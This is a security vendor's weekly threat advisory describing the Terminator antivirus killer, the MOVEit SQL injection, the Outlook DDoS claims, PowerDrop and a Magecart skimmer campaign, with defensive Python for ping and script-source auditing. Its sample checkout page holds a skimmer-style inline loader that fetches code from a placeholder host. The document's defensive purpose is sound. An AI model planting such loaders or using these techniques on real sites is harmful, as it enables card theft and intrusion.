Anonymous Sudan claims DDoS attacks on MS Outlook

SISA Weekly Threat Watch - 12 June 2023

With malicious actors constantly evolving their tactics to conceal their activities and make detection more challenging, ongoing vigilance and proactive security practices are vital to safeguard sensitive data from such threats. Over the last week, several new threat groups were involved in targeted campaigns, employing BYOVD (Bring Your Own Vulnerable Driver) attack tactics, web skimming, DDoS (distributed denial of service) attacks and PowerShell scripts.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Terminator antivirus killer: A vulnerable Windows driver in disguise

Security researchers have discovered that the Terminator antivirus killer promoted by the threat actor Spyboy has been used to enable BYOVD attacks. Terminator is claimed to be capable of bypassing 24 different antivirus (AV), Endpoint Detection and Response (EDR), and Extended Detection and Response (XDR) security solutions, including Windows Defender, on devices running Windows 7 and later.

Terminator aids the deployment of a legitimate Zemana anti-malware kernel driver “zamguard64.sys” or “zam64.sys” under a random name to the System32 folder; the driver is then used to end the user-mode processes of antivirus and endpoint detection and response software. It is recommended to practice strong Windows security roles hygiene, keep track of the drivers installed on systems, and implement the driver blocklist feature in Windows to block malicious drivers to safeguard against such types of attacks.

2. MOVEit Transfer vulnerability actively exploited

A widely recognized ransomware group has been linked to the recent zero-day attack on MOVEit, exploiting the vulnerability to illicitly obtain data from multiple organizations. CVE-2023-34362 refers to a SQL injection vulnerability present in the web application of MOVEit Transfer. Exploitation of this vulnerability can be carried out remotely by an unauthenticated attacker through a specially crafted request directed at a vulnerable instance of MOVEit Transfer. Notably, both the on-premises version of MOVEit Transfer and MOVEit Cloud were affected by this vulnerability.

Recent activities have been connected to a newly identified threat cluster named UNC4857. Researchers have identified the webshell utilized in the attack as LemurLoot. Observations indicate that victims located in the United States, Canada, and India experienced instances of data theft shortly after the deployment of the webshell. Users are recommended to disable all HTTP and HTTPS traffic to the MOVEit Transfer environment, review files and user accounts for unauthorized entries, install the fixed version of the software, and implement continuous monitoring practices to detect potential security threats and suspicious activities.

3. Microsoft Outlook hit by outages as Anonymous Sudan claims DDoS attacks

Microsoft Outlook was down for thousands of American users on 6th June 2023 after hacktivist group Anonymous Sudan claimed to have started a new campaign dedicated to targeting US companies and infrastructure. The outages created widespread disruptions for global Outlook users, preventing users worldwide from reliably accessing or sending email and using the mobile Outlook app.

Microsoft said that these outages were caused by a technical issue, switching their updates between saying they mitigated the issues and that the problem is happening again. While Microsoft claims technical issues caused the outages, Anonymous Sudan is claiming to be behind them, warning that they are performing DDoS attacks on Microsoft to protest the US getting involved in Sudanese internal affairs. To protect data from being compromised, organizations are recommended to enroll in a DDoS (Cloud) Mitigation protection service, identify critical assets, understand how users connect to the corporate networks, and ensure no security fixes are missing. As a redundancy measure, it is also advised to have a second ISP connection that can handle the traffic.

4. PowerDrop: A new insidious PowerShell Script targets U.S. aerospace defense industry

Security researchers recently discovered a new malware named PowerDrop, attributed to an unidentified threat actor, designed to target the aerospace industry in the U.S. This malware, based on PowerShell, employs sophisticated tactics such as deception, encoding, and encryption to avoid detection. It is a PowerShell command that is executed by the WMI (Windows Management Instrumentation) service.

The malware operates by sending Internet Control Message Protocol (ICMP) echo request messages, serving as a trigger for its C2 functionality. The malware’s primary objective is to execute remote commands on targeted networks after successfully infiltrating, executing, and maintaining persistence within servers. The malware’s operation tactics stand between “off-the-shelf” malware and advanced APT techniques, while the timing and targets suggest that the aggressor is likely state sponsored. It is recommended to conduct vulnerability scans on Windows systems and remain vigilant for any unusual pinging activity originating from the networks toward external sources to avoid being a victim of such attacks.
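The recommendation to watch for unusual outbound pinging can be turned into a simple flow-log check. The following is an added example, not part of the original advisory: the log format, the addresses and the thresholds are constructed assumptions, and the heuristics are generic rather than PowerDrop signatures.

```python
import ipaddress
from collections import defaultdict

# Constructed flow records: "epoch_seconds src dst icmp_type payload_bytes"
SAMPLE_FLOWS = """\
1686550000 10.0.4.17 203.0.113.50 8 128
1686550120 10.0.4.17 203.0.113.50 8 128
1686550240 10.0.4.17 203.0.113.50 8 128
1686550360 10.0.4.17 203.0.113.50 8 128
1686550010 10.0.2.9 10.0.0.1 8 32
1686550020 10.0.7.3 198.51.100.7 8 32
1686550030 10.0.7.3 198.51.100.7 0 32
"""

# Assumed internal address space (RFC 1918); adjust to the monitored network.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
DEFAULT_PING_SIZES = {32, 56}  # default payload sizes of Windows and Linux ping

def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL)

def suspicious_outbound_pings(log_text, min_count=3):
    """Flag internal hosts that send echo requests to external hosts
    repeatedly, at a fixed interval, or with non-default payload sizes."""
    pairs = defaultdict(list)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed records
        ts, src, dst, icmp_type, size = fields
        # ICMP type 8 is an echo request; only internal -> external matters here.
        if icmp_type == "8" and is_internal(src) and not is_internal(dst):
            pairs[(src, dst)].append((int(ts), int(size)))
    findings = []
    for (src, dst), events in sorted(pairs.items()):
        events.sort()
        reasons = []
        if len(events) >= min_count:
            reasons.append("repeated")
        if any(size not in DEFAULT_PING_SIZES for _, size in events):
            reasons.append("odd-payload-size")
        gaps = {b[0] - a[0] for a, b in zip(events, events[1:])}
        if len(events) >= min_count and len(gaps) == 1:
            reasons.append("fixed-interval")
        if reasons:
            findings.append({"src": src, "dst": dst, "count": len(events), "reasons": reasons})
    return findings
```

A single default-size ping to an external host is not reported; only the host that pings the same external address four times, 120 seconds apart, with a 128-byte payload is.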

5. New Magecart-style campaign abusing legitimate websites to attack others

Researchers have discovered a new ongoing Magecart-style web skimmer campaign, designed to steal personally identifiable information (PII) and credit card information from digital commerce websites. The initial step of the current attack campaign is to identify vulnerable legitimate sites and hack them to host their malicious code, using them as C2 servers for their attacks. By distributing credit card skimmers using legitimate websites with a good reputation, the threat actors evade detection and blocks and are freed from needing to set up their own infrastructure.

Thereafter, the attackers move to inject a small JavaScript snippet into the target commerce sites that fetches the malicious code from the websites compromised previously. After the skimmers steal the customers’ details, the data is sent to the attacker’s server via an HTTP request created as an IMG tag within the skimmer. To prevent this initial access to the server, it is advised to keep up with the most recent patches and complement them by implementing WAF (Web Application Firewalls). Website owners can defend against Magecart infections by appropriately protecting website admin accounts and applying security updates for their CMS and plugins.
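Because the loader is served from reputable third-party sites, a blocklist will not catch it, but an allowlist audit of the checkout page will. The following is an added example, not part of the original advisory: the page, host names and allowlist are constructed placeholders. It reports every script source, and every URL inside an inline script, whose host is not expected.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page; host names are placeholders, not indicators.
SAMPLE_PAGE = """
<html><head>
<script src="/static/cart.js"></script>
<script src="https://cdn.shop.example/vendor/pay.js"></script>
<script src="https://blog.reputable.example/wp-content/a.js"></script>
<script>var s=document.createElement('script');
s.src='//news.reputable.example/lib.js';document.head.appendChild(s);</script>
</head><body><img src="https://img.shop.example/logo.png"></body></html>
"""

# Assumed allowlist of hosts the shop legitimately loads scripts from.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example", "img.shop.example"}
# Quoted absolute or protocol-relative URLs inside inline JavaScript.
URL_IN_JS = re.compile(r"""['"]((?:https?:)?//[^'"\s]+)['"]""")

class ScriptAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.findings = []  # list of (kind, host)

    def check(self, kind, url):
        host = urlparse(url).hostname  # None for relative (same-origin) URLs
        if host and host not in ALLOWED_HOSTS:
            self.findings.append((kind, host))

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            src = dict(attrs).get("src")
            if src:
                self.check("script-src", src)

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:  # inline script body: look for remote loader URLs
            for url in URL_IN_JS.findall(data):
                self.check("inline-loader", url)

def audit(html):
    parser = ScriptAudit()
    parser.feed(html)
    return parser.findings
```

A static audit like this sees only what is in the served HTML. The IMG request that carries the stolen data is created at run time, so restricting it is a job for a Content-Security-Policy with `script-src` and `img-src` allowlists.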

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
